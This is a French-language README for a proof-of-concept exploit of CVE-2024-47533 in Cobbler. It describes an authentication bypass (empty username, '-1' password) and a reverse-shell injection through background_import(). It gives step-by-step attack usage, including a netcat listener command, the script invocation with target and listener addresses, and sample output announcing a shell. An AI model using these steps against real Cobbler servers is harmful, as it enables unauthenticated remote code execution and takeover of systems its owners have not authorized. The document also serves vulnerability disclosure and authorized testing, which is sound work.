
Exploit de preuve de concept pour CVE-2024-47533, un contournement d'authentification non authentifié dans l'API XMLRPC de Cobbler conduisant à une exécution de code à distance via un shell inverse injecté.
Ce dépôt contient une preuve de concept (PoC) d'exploit pour CVE-2024-47533,
un contournement critique de l'authentification dans l'API XMLRPC de Cobbler qui conduit à une exécution de code à distance non authentifiée (RCE).
L'exploit exploite la faille de la méthode login() de l'API XMLRPC pour contourner l'authentification et injecter une commande de reverse shell via background_import().
Cet outil est destiné uniquement à des fins éducatives, de recherche et de tests de pénétration autorisés.
Ne l'utilisez PAS sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation écrite explicite.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages.
Cause racine :
utils.get_shared_secret() retourne incorrectement -1 en raison d'une mauvaise gestion des lectures de fichiers en mode binaire avec un encodage, permettant l'authentification avec un nom d'utilisateur vide et -1 comme mot de passe.
Impact :
Un attaquant peut :
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
Sur votre machine d'attaque :
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
Exemple :
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Reverse shell exploit script
└── README.md # Documentation
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
00xCanelo
Profil GitHub